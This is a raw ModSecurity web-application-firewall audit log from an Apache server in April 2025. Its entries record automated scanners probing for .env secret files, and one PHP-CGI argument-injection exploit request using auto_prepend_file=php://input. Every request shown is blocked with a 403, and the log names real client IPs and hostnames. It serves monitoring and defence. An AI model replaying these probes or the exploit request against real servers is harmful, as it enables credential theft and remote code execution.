154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c0e2a625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0e2a625-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172730484 757 (- - -) Stopwatch2: 1745242172730484 757; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0e2a625-Z-- --0e62687d-A-- [21/Apr/2025:20:29:33 +0700] aAZIPZjcgo97ICfbW9NzEwAAABE 103.236.140.4 34102 103.236.140.4 8181 --0e62687d-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0e62687d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e62687d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242173111821 715 (- - -) Stopwatch2: 1745242173111821 715; combined=272, p1=237, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e62687d-Z-- --f0825a55-A-- [21/Apr/2025:20:45:54 +0700] aAZMEpjcgo97ICfbW9OCBgAAAAE 103.236.140.4 58522 103.236.140.4 8181 --f0825a55-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.98.33.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.98.33.75 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --f0825a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0825a55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745243154312607 712 (- - -) Stopwatch2: 1745243154312607 712; combined=245, p1=216, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0825a55-Z-- --fc307a07-A-- [21/Apr/2025:22:46:31 +0700] aAZoV3gNnYly62OFre4UkgAAAEM 103.236.140.4 46940 103.236.140.4 8181 --fc307a07-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 2.58.56.225 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 2.58.56.225 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --fc307a07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc307a07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745250391210483 1075 (- - -) Stopwatch2: 1745250391210483 1075; combined=422, p1=380, p2=0, p3=0, p4=0, p5=42, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc307a07-Z-- --43dc772f-A-- [21/Apr/2025:23:35:06 +0700] aAZzunfk8_rbvOkGr1q3aAAAAIA 103.236.140.4 60772 103.236.140.4 8181 --43dc772f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.133.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.133.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --43dc772f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43dc772f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745253306287474 598 (- - -) Stopwatch2: 1745253306287474 598; combined=220, p1=192, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43dc772f-Z-- --6bbaa35b-A-- [22/Apr/2025:01:27:14 +0700] aAaOAngNnYly62OFre6zWgAAAEE 103.236.140.4 48472 103.236.140.4 8181 --6bbaa35b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6bbaa35b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bbaa35b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745260034769531 761 (- - -) Stopwatch2: 1745260034769531 761; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bbaa35b-Z-- --ceb8ea0a-A-- [22/Apr/2025:01:27:18 +0700] aAaOBngNnYly62OFre6zZAAAAEk 103.236.140.4 48648 103.236.140.4 8181 --ceb8ea0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ceb8ea0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb8ea0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745260038248135 817 (- - -) Stopwatch2: 1745260038248135 817; combined=346, p1=301, p2=0, p3=0, p4=0, p5=45, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb8ea0a-Z-- --efe50865-A-- [22/Apr/2025:02:53:14 +0700] aAaiKqLIR8aniCwJv2WoTQAAAMk 103.236.140.4 58634 103.236.140.4 8181 --efe50865-B-- GET /env/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --efe50865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe50865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265194824381 748 (- - -) Stopwatch2: 1745265194824381 748; combined=272, p1=235, p2=0, p3=0, p4=0, p5=37, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efe50865-Z-- --40c0d846-A-- [22/Apr/2025:02:53:15 +0700] aAaiK6LIR8aniCwJv2WoTwAAAMY 103.236.140.4 58672 103.236.140.4 8181 --40c0d846-B-- GET /favs/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --40c0d846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c0d846-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265195514545 623 (- - -) Stopwatch2: 1745265195514545 623; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c0d846-Z-- --da0be70b-A-- [22/Apr/2025:02:53:16 +0700] aAaiLHgNnYly62OFre7ysAAAAEA 103.236.140.4 58706 103.236.140.4 8181 --da0be70b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --da0be70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0be70b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265196218385 774 (- - -) Stopwatch2: 1745265196218385 774; combined=305, p1=269, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0be70b-Z-- --65019676-A-- [22/Apr/2025:02:53:16 +0700] aAaiLHfk8_rbvOkGr1pkuwAAAIc 103.236.140.4 58748 103.236.140.4 8181 --65019676-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --65019676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65019676-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265196905164 868 (- - -) Stopwatch2: 1745265196905164 868; combined=436, p1=398, p2=0, p3=0, p4=0, p5=38, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65019676-Z-- --5437d05d-A-- [22/Apr/2025:02:53:17 +0700] aAaiLXfk8_rbvOkGr1pkwwAAAI8 103.236.140.4 58786 103.236.140.4 8181 --5437d05d-B-- GET /cgi-bin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --5437d05d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5437d05d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265197600837 743 (- - -) Stopwatch2: 1745265197600837 743; combined=322, p1=287, p2=0, p3=0, p4=0, p5=34, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5437d05d-Z-- --7502ca7b-A-- [22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoVQAAAMo 103.236.140.4 58820 103.236.140.4 8181 --7502ca7b-B-- GET /content/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7502ca7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7502ca7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265198304403 775 (- - -) Stopwatch2: 1745265198304403 775; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7502ca7b-Z-- --4a79de63-A-- [22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoWAAAAM0 103.236.140.4 58866 103.236.140.4 8181 --4a79de63-B-- GET /custom/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4a79de63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a79de63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265198996102 648 (- - -) Stopwatch2: 1745265198996102 648; combined=239, p1=211, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a79de63-Z-- --d205c757-A-- [22/Apr/2025:03:53:23 +0700] aAawQ19gRrTzIZGIAflDmgAAAJI 103.236.140.4 44722 103.236.140.4 8181 --d205c757-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.20.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.20.147 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d205c757-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d205c757-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745268803214051 922 (- - -) Stopwatch2: 1745268803214051 922; combined=401, p1=363, p2=0, p3=0, p4=0, p5=37, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d205c757-Z-- --80613c45-A-- [22/Apr/2025:05:45:57 +0700] aAbKpV9gRrTzIZGIAflNiQAAAIw 103.236.140.4 37066 103.236.140.4 8181 --80613c45-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.144.212.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.144.212.120 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --80613c45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80613c45-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745275557531826 899 (- - -) Stopwatch2: 1745275557531826 899; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80613c45-Z-- --e2de2c4a-A-- [22/Apr/2025:05:46:33 +0700] aAbKya3OiIHZ_gUDzTtlgwAAAM0 103.236.140.4 38960 103.236.140.4 8181 --e2de2c4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36 Accept-Charset: utf-8 --e2de2c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2de2c4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745275593144333 699 (- - -) Stopwatch2: 1745275593144333 699; combined=301, p1=270, p2=0, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2de2c4a-Z-- --8c8c8e43-A-- [22/Apr/2025:06:08:48 +0700] aAbQAM0DNRaK3AYHswK10AAAAAw 103.236.140.4 53790 103.236.140.4 8181 --8c8c8e43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 8.1.0; zh-CN; EML-AL00 Build/HUAWEIEML-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 baidu.sogo.uc.UCBrowser/11.9.4.974 UWS/2.13.1.48 Mobile Safari/537.36 AliApp(DingTalk/4.5.11) com.alibaba.android.rimet/10487439 Channel/227200 language/zh-CN Accept-Charset: utf-8 --8c8c8e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c8c8e43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745276928326370 900 (- - -) Stopwatch2: 1745276928326370 900; combined=392, p1=353, p2=0, p3=0, p4=0, p5=39, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c8c8e43-Z-- --fb845f6d-A-- [22/Apr/2025:08:05:57 +0700] aAbrdc0DNRaK3AYHswIYOAAAABY 103.236.140.4 36284 103.236.140.4 8181 --fb845f6d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --fb845f6d-C-- --fb845f6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb845f6d-E-- --fb845f6d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745283957746041 4796 (- - -) Stopwatch2: 1745283957746041 4796; combined=3638, p1=549, p2=3046, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb845f6d-Z-- --3be0f011-A-- [22/Apr/2025:08:20:48 +0700] aAbu8M0DNRaK3AYHswIl4wAAABU 103.236.140.4 33142 103.236.140.4 8181 --3be0f011-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; PIC-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --3be0f011-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be0f011-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745284848519930 788 (- - -) Stopwatch2: 1745284848519930 788; combined=370, p1=333, p2=0, p3=0, p4=0, p5=36, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be0f011-Z-- --e6a1b572-A-- [22/Apr/2025:09:12:16 +0700] aAb7AK3OiIHZ_gUDzTsatgAAAMw 103.236.140.4 37220 103.236.140.4 8181 --e6a1b572-B-- GET /.env HTTP/1.0 